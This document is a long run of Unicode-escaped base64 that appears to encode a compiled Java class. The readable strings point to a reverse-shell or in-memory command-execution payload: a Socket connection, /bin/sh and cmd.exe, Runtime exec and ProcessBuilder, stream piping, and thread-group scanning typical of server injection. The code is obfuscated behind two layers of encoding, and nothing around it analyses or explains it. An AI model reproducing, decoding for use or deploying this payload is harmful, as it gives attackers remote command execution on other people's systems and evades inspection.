\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0051\u006e\u0056\u0070\u0062\u0047\u0052\u006c\u0063\u0067\u0077\u0042\u0063\u0067\u0046\u007a\u0041\u0051\u0041\u0046\u0049\u0043\u0031\u0075\u0049\u0044\u0051\u0042\u0041\u0041\u0049\u0076\u0059\u0077\u0045\u0041\u0042\u0053\u0041\u0074\u0064\u0043\u0041\u0030\u0041\u0051\u0041\u0043\u0063\u0032\u0067\u0042\u0041\u0041\u0049\u0074\u0059\u0077\u0063\u0042\u0064\u0041\u0077\u0042\u0064\u0051\u0046\u0032\u0044\u0041\u0043\u0066\u0041\u0058\u0063\u0042\u0041\u0042\u0046\u0071\u0059\u0058\u005a\u0068\u004c\u0033\u0056\u0030\u0061\u0057\u0077\u0076\u0055\u0032\u004e\u0068\u0062\u006d\u0035\u006c\u0063\u0067\u0063\u0042\u0065\u0041\u0077\u0042\u0065\u0051\u0046\u0036\u0044\u0041\u0043\u0052\u0041\u0058\u0073\u0042\u0041\u0041\u004a\u0063\u0059\u0051\u0077\u0042\u0066\u0041\u0046\u0039\u0044\u0041\u0046\u0048\u0041\u0054\u0034\u004d\u0041\u0058\u0034\u0042\u0065\u0067\u0077\u0042\u0066\u0077\u0043\u0053\u0041\u0051\u0041\u0048\u004c\u0032\u004a\u0070\u0062\u0069\u0039\u007a\u0061\u0041\u0045\u0041\u0042\u0032\u004e\u0074\u005a\u0043\u0035\u006c\u0065\u0047\u0055\u004d\u0041\u004a\u0038\u0042\u0067\u0041\u0045\u0041\u0044\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u006d\u0056\u0030\u004c\u0031\u004e\u0076\u0059\u0032\u0074\u006c\u0064\u0041\u0077\u0041\u006b\u0051\u0043\u0068\u0044\u0041\u0047\u0042\u0041\u0059\u0049\u004d\u0041\u0059\u004d\u0042\u0052\u0067\u0063\u0042\u0068\u0041\u0077\u0042\u0068\u0051\u0047\u0047\u0044\u0041\u0047\u0048\u0041\u0059\u0059\u0048\u0041\u0059\u0067\u004d\u0041\u004a\u0077\u0042\u0069\u0051\u0077\u0042\u0069\u0067\u0047\u004c\u0044\u0041\u0047\u004d\u0041\u0059\u0059\u004d\u0041\u0059\u0030\u0042\u0050\u0067\u0077\u0042\u006a\u0067\u0047\u0047\u0044\u0041\u0043\u0067\u0041\u004b\u0045\u0042\u0041\u0042\u005a\u007a\u0064\u0057\u0034\u0075\u0062\u0057\u006c\u007a\u0059\u0079\u0035\u0043\u0051\u0056\u004e\u0046\u004e\u006a\u0052\u0045\u005a\u0057\u004e\u0076\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u004d\u005a\u0047\u0056\u006a\u0062\u0032\u0052\u006c\u0051\u006e\u0056\u006d\u005a\u006d\u0056\u0079\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0035\u0031\u0064\u0047\u006c\u0073\u004c\u006b\u004a\u0068\u0063\u0032\u0055\u0032\u004e\u0041\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0045\u0052\u006c\u0059\u0032\u0039\u006b\u005a\u0058\u0049\u0042\u0041\u0043\u005a\u0076\u0063\u006d\u0063\u0075\u0059\u0058\u0042\u0068\u0059\u0032\u0068\u006c\u004c\u006d\u004e\u0076\u0062\u0057\u0031\u0076\u0062\u006e\u004d\u0075\u0059\u0032\u0039\u006b\u005a\u0057\u004d\u0075\u0059\u006d\u006c\u0075\u0059\u0058\u004a\u0035\u004c\u006b\u004a\u0068\u0063\u0032\u0055\u0032\u004e\u0041\u0045\u0041\u0041\u006b\u0045\u0030\u0041\u0051\u0041\u004e\u0059\u0033\u0056\u0079\u0063\u006d\u0056\u0075\u0064\u0046\u0052\u006f\u0063\u006d\u0056\u0068\u005a\u0041\u0045\u0041\u0046\u0043\u0067\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0055\u0061\u0048\u004a\u006c\u0059\u0057\u0051\u0037\u0041\u0051\u0041\u004f\u005a\u0032\u0056\u0030\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0052\u0033\u004a\u0076\u0064\u0058\u0041\u0042\u0041\u0042\u006b\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0052\u0033\u004a\u0076\u0064\u0058\u0041\u0037\u0041\u0051\u0041\u0049\u005a\u0032\u0056\u0030\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0042\u0041\u0042\u004d\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0051\u005a\u0032\u0056\u0030\u0052\u0047\u0056\u006a\u0062\u0047\u0046\u0079\u005a\u0057\u0052\u0047\u0061\u0057\u0056\u0073\u005a\u0041\u0045\u0041\u004c\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0079\u005a\u0057\u005a\u0073\u005a\u0057\u004e\u0030\u004c\u0030\u005a\u0070\u005a\u0057\u0078\u006b\u004f\u0077\u0045\u0041\u0046\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0079\u005a\u0057\u005a\u0073\u005a\u0057\u004e\u0030\u004c\u0030\u005a\u0070\u005a\u0057\u0078\u006b\u0041\u0051\u0041\u004e\u0063\u0032\u0056\u0030\u0051\u0057\u004e\u006a\u005a\u0058\u004e\u007a\u0061\u0057\u004a\u0073\u005a\u0051\u0045\u0041\u0042\u0043\u0068\u0061\u004b\u0056\u0059\u0042\u0041\u0041\u004e\u006e\u005a\u0058\u0051\u0042\u0041\u0043\u0059\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0050\u0059\u006d\u0070\u006c\u0059\u0033\u0051\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0054\u0032\u004a\u0071\u005a\u0057\u004e\u0030\u004f\u0077\u0045\u0041\u0042\u0032\u0064\u006c\u0064\u0045\u0035\u0068\u0062\u0057\u0055\u0042\u0041\u0042\u0051\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0077\u0045\u0041\u0043\u0047\u004e\u0076\u0062\u006e\u0052\u0068\u0061\u0057\u0035\u007a\u0041\u0051\u0041\u0062\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0068\u0068\u0063\u006c\u004e\u006c\u0063\u0058\u0056\u006c\u0062\u006d\u004e\u006c\u004f\u0079\u006c\u0061\u0041\u0051\u0041\u004e\u005a\u0032\u0056\u0030\u0055\u0033\u0056\u0077\u005a\u0058\u004a\u006a\u0062\u0047\u0046\u007a\u0063\u0077\u0045\u0041\u0043\u0047\u006c\u0030\u005a\u0058\u004a\u0068\u0064\u0047\u0039\u0079\u0041\u0051\u0041\u0057\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0030\u006c\u0030\u005a\u0058\u004a\u0068\u0064\u0047\u0039\u0079\u004f\u0077\u0045\u0041\u0045\u006d\u0070\u0068\u0064\u006d\u0045\u0076\u0064\u0058\u0052\u0070\u0062\u0043\u0039\u004a\u0064\u0047\u0056\u0079\u0059\u0058\u0052\u0076\u0063\u0067\u0045\u0041\u0042\u0032\u0068\u0068\u0063\u0030\u0035\u006c\u0065\u0048\u0051\u0042\u0041\u0041\u004d\u006f\u004b\u0056\u006f\u0042\u0041\u0041\u0052\u0075\u005a\u0058\u0068\u0030\u0041\u0051\u0041\u0055\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0042\u0041\u0041\u006c\u006e\u005a\u0058\u0052\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0042\u0041\u0045\u0041\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0057\u0030\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0063\u006d\u0056\u006d\u0062\u0047\u0056\u006a\u0064\u0043\u0039\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0037\u0041\u0051\u0041\u0059\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0033\u004a\u006c\u005a\u006d\u0078\u006c\u0059\u0033\u0051\u0076\u0054\u0057\u0056\u0030\u0061\u0047\u0039\u006b\u0041\u0051\u0041\u0047\u0061\u0057\u0035\u0032\u0062\u0032\u0074\u006c\u0041\u0051\u0041\u0035\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0054\u0032\u004a\u0071\u005a\u0057\u004e\u0030\u004f\u0031\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0050\u0059\u006d\u0070\u006c\u0059\u0033\u0051\u0037\u0041\u0051\u0041\u0049\u005a\u0032\u0056\u0030\u0051\u006e\u006c\u0030\u005a\u0058\u004d\u0042\u0041\u0041\u0051\u006f\u004b\u0056\u0074\u0043\u0041\u0051\u0041\u0052\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u006c\u0075\u0064\u0047\u0056\u006e\u005a\u0058\u0049\u0042\u0041\u0041\u0052\u0055\u0057\u0056\u0042\u0046\u0041\u0051\u0041\u0052\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u007a\u0073\u0042\u0041\u0041\u0064\u0032\u0059\u0057\u0078\u0031\u005a\u0055\u0039\u006d\u0041\u0051\u0041\u0057\u004b\u0045\u006b\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u004a\u0062\u006e\u0052\u006c\u005a\u0032\u0056\u0079\u004f\u0077\u0045\u0041\u0043\u0032\u0035\u006c\u0064\u0030\u006c\u0075\u0063\u0033\u0052\u0068\u0062\u006d\u004e\u006c\u0041\u0051\u0041\u0052\u005a\u0032\u0056\u0030\u0052\u0047\u0056\u006a\u0062\u0047\u0046\u0079\u005a\u0057\u0052\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0042\u0041\u0041\u0064\u006d\u0062\u0033\u004a\u004f\u0059\u0057\u0031\u006c\u0041\u0051\u0041\u0056\u005a\u0032\u0056\u0030\u0051\u0032\u0039\u0075\u0064\u0047\u0056\u0034\u0064\u0045\u004e\u0073\u0059\u0058\u004e\u007a\u0054\u0047\u0039\u0068\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u005a\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u0073\u0059\u0058\u004e\u007a\u0054\u0047\u0039\u0068\u005a\u0047\u0056\u0079\u004f\u0077\u0045\u0041\u0046\u0057\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0030\u0078\u0076\u0059\u0057\u0052\u006c\u0063\u0067\u0045\u0041\u0042\u006d\u0056\u0078\u0064\u0057\u0046\u0073\u0063\u0077\u0045\u0041\u0046\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0070\u0057\u0067\u0045\u0041\u0042\u0048\u0052\u0079\u0061\u0057\u0030\u0042\u0041\u0041\u0070\u007a\u0064\u0047\u0046\u0079\u0064\u0048\u004e\u0058\u0061\u0058\u0052\u006f\u0041\u0051\u0041\u0056\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u0061\u0041\u0051\u0041\u0046\u0063\u0033\u0042\u0073\u0061\u0058\u0051\u0042\u0041\u0043\u0063\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0042\u0041\u0041\u0068\u0077\u0059\u0058\u004a\u007a\u005a\u0055\u006c\u0075\u0064\u0041\u0045\u0041\u0046\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0053\u0051\u0045\u0041\u0046\u0079\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004a\u0031\u0062\u006d\u0035\u0068\u0059\u006d\u0078\u006c\u004f\u0079\u006c\u0057\u0041\u0051\u0041\u0046\u0063\u0033\u0052\u0068\u0063\u006e\u0051\u0042\u0041\u0042\u0055\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0059\u0042\u0041\u0042\u0045\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0052\u006d\u006c\u0073\u005a\u0054\u0073\u0070\u0056\u0067\u0045\u0041\u0042\u0053\u0068\u0062\u0051\u0069\u006c\u0057\u0041\u0051\u0041\u0046\u005a\u006d\u0078\u0031\u0063\u0032\u0067\u0042\u0041\u0041\u0056\u006a\u0062\u0047\u0039\u007a\u005a\u0051\u0045\u0041\u0043\u0048\u0052\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0041\u0051\u0041\u0050\u005a\u0032\u0056\u0030\u0051\u0057\u004a\u007a\u0062\u0032\u0078\u0031\u0064\u0047\u0056\u0051\u0059\u0058\u0052\u006f\u0041\u0051\u0041\u0048\u0063\u006d\u0056\u0077\u0062\u0047\u0046\u006a\u005a\u0051\u0045\u0041\u0052\u0043\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u006f\u0059\u0058\u004a\u0054\u005a\u0058\u0046\u0031\u005a\u0057\u0035\u006a\u005a\u0054\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u006f\u0059\u0058\u004a\u0054\u005a\u0058\u0046\u0031\u005a\u0057\u0035\u006a\u005a\u0054\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0035\u0063\u0033\u0052\u006c\u0062\u0051\u0045\u0041\u0043\u0032\u0064\u006c\u0064\u0046\u0042\u0079\u0062\u0033\u0042\u006c\u0063\u006e\u0052\u0035\u0041\u0051\u0041\u004c\u0064\u0047\u0039\u004d\u0062\u0033\u0064\u006c\u0063\u006b\u004e\u0068\u0063\u0032\u0055\u0042\u0041\u0041\u005a\u0068\u0063\u0048\u0042\u006c\u0062\u006d\u0051\u0042\u0041\u0043\u0030\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0051\u006e\u0056\u0070\u0062\u0047\u0052\u006c\u0063\u006a\u0073\u0042\u0041\u0042\u0046\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0064\u0047\u006c\u0074\u005a\u0051\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0046\u004a\u0031\u0062\u006e\u0052\u0070\u0062\u0057\u0055\u0042\u0041\u0042\u0055\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0064\u0047\u006c\u0074\u005a\u0054\u0073\u0042\u0041\u0043\u0067\u006f\u0057\u0030\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0052\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0042\u0041\u0041\u0035\u006e\u005a\u0058\u0052\u004a\u0062\u006e\u0042\u0031\u0064\u0046\u004e\u0030\u0063\u006d\u0056\u0068\u0062\u0051\u0045\u0041\u0046\u0079\u0067\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0053\u0057\u0035\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0037\u0041\u0051\u0041\u0059\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u006c\u0075\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u004f\u0079\u006c\u0057\u0041\u0051\u0041\u004d\u0064\u0058\u004e\u006c\u0052\u0047\u0056\u0073\u0061\u0057\u0031\u0070\u0064\u0047\u0056\u0079\u0041\u0051\u0041\u006e\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0031\u004e\u006a\u0059\u0057\u0035\u0075\u005a\u0058\u0049\u0037\u0041\u0051\u0041\u004f\u005a\u0032\u0056\u0030\u0052\u0058\u004a\u0079\u0062\u0033\u004a\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0042\u0041\u0041\u0064\u006b\u005a\u0058\u004e\u0030\u0063\u006d\u0039\u0035\u0041\u0051\u0041\u006e\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0050\u005a\u0032\u0056\u0030\u0054\u0033\u0056\u0030\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u0059\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0070\u0062\u0079\u0039\u0050\u0064\u0058\u0052\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0037\u0041\u0051\u0041\u0049\u0061\u0058\u004e\u0044\u0062\u0047\u0039\u007a\u005a\u0057\u0051\u0042\u0041\u0042\u004e\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u006c\u0075\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u004a\u0059\u0058\u005a\u0068\u0061\u0057\u0078\u0068\u0059\u006d\u0078\u006c\u0041\u0051\u0041\u0044\u004b\u0043\u006c\u004a\u0041\u0051\u0041\u0045\u0063\u006d\u0056\u0068\u005a\u0041\u0045\u0041\u0046\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0054\u0033\u0056\u0030\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u0045\u004b\u0045\u006b\u0070\u0056\u0067\u0045\u0041\u0042\u0058\u004e\u0073\u005a\u0057\u0056\u0077\u0041\u0051\u0041\u0045\u004b\u0045\u006f\u0070\u0056\u0067\u0045\u0041\u0043\u0057\u0056\u0034\u0061\u0058\u0052\u0057\u0059\u0057\u0078\u0031\u005a\u0051\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0045\u0031\u006c\u0063\u0033\u004e\u0068\u005a\u0032\u0055\u0042\u0041\u0041\u0068\u0070\u0062\u006e\u0052\u0057\u0059\u0057\u0078\u0031\u005a\u0051\u0041\u0068\u0041\u0049\u0077\u0041\u0048\u0067\u0041\u0042\u0041\u0041\u0038\u0041\u0041\u0067\u0041\u0043\u0041\u0049\u0030\u0041\u006a\u0067\u0041\u0041\u0041\u0041\u0049\u0041\u006a\u0077\u0043\u0051\u0041\u0041\u0041\u0041\u0043\u0051\u0041\u0042\u0041\u004a\u0045\u0041\u006b\u0067\u0041\u0043\u0041\u004a\u004d\u0041\u0041\u0041\u004f\u0032\u0041\u0041\u0059\u0041\u0045\u0077\u0041\u0041\u0041\u006f\u0034\u0071\u0074\u0077\u0041\u0042\u0075\u0041\u0041\u0043\u0074\u0067\u0041\u0044\u0054\u0043\u0075\u0032\u0041\u0041\u0051\u0053\u0042\u0062\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u0072\u0074\u0067\u0041\u0049\u0077\u0041\u0041\u004a\u0077\u0041\u0041\u004a\u0054\u0069\u0030\u0036\u0042\u0042\u006b\u0045\u0076\u006a\u0059\u0046\u0041\u007a\u0059\u0047\u0046\u0051\u0059\u0056\u0042\u0061\u0049\u0043\u0057\u0042\u006b\u0045\u0046\u0051\u0059\u0079\u004f\u0067\u0063\u005a\u0042\u0038\u0063\u0041\u0042\u0071\u0063\u0043\u0051\u0078\u006b\u0048\u0074\u0067\u0041\u004b\u004f\u0067\u0067\u005a\u0043\u0042\u0049\u004c\u0074\u0067\u0041\u004d\u006d\u0067\u0041\u004e\u0047\u0051\u0067\u0053\u0044\u0062\u0059\u0041\u0044\u004a\u006f\u0041\u0042\u0071\u0063\u0043\u004a\u0052\u006b\u0048\u0074\u0067\u0041\u0045\u0045\u0067\u0036\u0032\u0041\u0041\u005a\u004e\u004c\u0041\u0053\u0032\u0041\u0041\u0063\u0073\u0047\u0051\u0065\u0032\u0041\u0041\u0067\u0036\u0043\u0052\u006b\u004a\u0077\u0051\u0041\u0050\u006d\u0067\u0041\u0047\u0070\u0077\u0049\u0043\u0047\u0051\u006d\u0032\u0041\u0041\u0051\u0053\u0045\u004c\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u005a\u0043\u0062\u0059\u0041\u0043\u0044\u006f\u004a\u0047\u0051\u006d\u0032\u0041\u0041\u0051\u0053\u0045\u0062\u0059\u0041\u0042\u006b\u0032\u006e\u0041\u0042\u0059\u0036\u0043\u0068\u006b\u004a\u0074\u0067\u0041\u0045\u0074\u0067\u0041\u0054\u0074\u0067\u0041\u0054\u0045\u0068\u0047\u0032\u0041\u0041\u005a\u004e\u004c\u0041\u0053\u0032\u0041\u0041\u0063\u0073\u0047\u0051\u006d\u0032\u0041\u0041\u0067\u0036\u0043\u0052\u006b\u004a\u0074\u0067\u0041\u0045\u0074\u0067\u0041\u0054\u0045\u0068\u0053\u0032\u0041\u0041\u005a\u004e\u0070\u0077\u0041\u0051\u004f\u0067\u006f\u005a\u0043\u0062\u0059\u0041\u0042\u0042\u0049\u0055\u0074\u0067\u0041\u0047\u0054\u0053\u0077\u0045\u0074\u0067\u0041\u0048\u004c\u0042\u006b\u004a\u0074\u0067\u0041\u0049\u004f\u0067\u006b\u005a\u0043\u0062\u0059\u0041\u0042\u0042\u0049\u0056\u0074\u0067\u0041\u0047\u0054\u0053\u0077\u0045\u0074\u0067\u0041\u0048\u004c\u0042\u006b\u004a\u0074\u0067\u0041\u0049\u0077\u0041\u0041\u0057\u0077\u0041\u0041\u0057\u004f\u0067\u006f\u005a\u0043\u0072\u006b\u0041\u0046\u0077\u0045\u0041\u004f\u0067\u0073\u005a\u0043\u0037\u006b\u0041\u0047\u0041\u0045\u0041\u006d\u0051\u0046\u0062\u0047\u0051\u0075\u0035\u0041\u0042\u006b\u0042\u0041\u0044\u006f\u004d\u0047\u0051\u0079\u0032\u0041\u0041\u0051\u0053\u0047\u0072\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u005a\u0044\u004c\u0059\u0041\u0043\u0044\u006f\u004e\u0047\u0051\u0032\u0032\u0041\u0041\u0051\u0053\u0047\u0077\u004f\u0039\u0041\u0042\u0079\u0032\u0041\u0042\u0030\u005a\u0044\u0051\u004f\u0039\u0041\u0042\u0036\u0032\u0041\u0042\u0038\u0036\u0044\u0068\u006b\u004e\u0074\u0067\u0041\u0045\u0045\u0069\u0041\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0030\u005a\u0044\u0051\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u0049\u0069\u0055\u0037\u0059\u0041\u0048\u0038\u0041\u0041\u0049\u0054\u006f\u0050\u0047\u0051\u002f\u0048\u0041\u0041\u0061\u006e\u002f\u0035\u0045\u0071\u0047\u0051\u002b\u0032\u0041\u0043\u004f\u0032\u0041\u0043\u0051\u0036\u0045\u0042\u006b\u004f\u0074\u0067\u0041\u0045\u0045\u0069\u0055\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004f\u0079\u0041\u0043\u005a\u0054\u0074\u0067\u0041\u0064\u0047\u0051\u0034\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u0052\u0041\u004d\u0069\u0034\u0041\u0043\u0064\u0054\u0074\u0067\u0041\u0066\u0056\u0079\u006f\u0053\u004b\u004c\u0059\u0041\u004b\u0054\u006f\u0052\u0047\u0052\u0047\u0032\u0041\u0043\u006f\u0036\u0043\u0052\u006b\u0052\u0045\u0069\u0073\u0047\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u004c\u0046\u004e\u005a\u0042\u004c\u0049\u0041\u004a\u006c\u004e\u005a\u0042\u0062\u0049\u0041\u004a\u006c\u004f\u0032\u0041\u0043\u0030\u005a\u0043\u0051\u0061\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u006b\u0051\u0055\u0031\u006b\u0045\u0041\u0037\u0067\u0041\u004a\u0031\u004e\u005a\u0042\u0052\u006b\u0051\u0076\u0072\u0067\u0041\u004a\u0031\u004f\u0032\u0041\u0042\u0039\u0058\u0047\u0051\u0036\u0032\u0041\u0041\u0051\u0053\u004c\u0067\u0053\u0039\u0041\u0042\u0078\u005a\u0041\u0078\u006b\u0052\u0055\u0037\u0059\u0041\u0048\u0052\u006b\u004f\u0042\u004c\u0030\u0041\u0048\u006c\u006b\u0044\u0047\u0051\u006c\u0054\u0074\u0067\u0041\u0066\u0056\u0036\u0063\u0041\u0054\u007a\u006f\u0052\u004b\u0068\u0049\u0077\u0074\u0067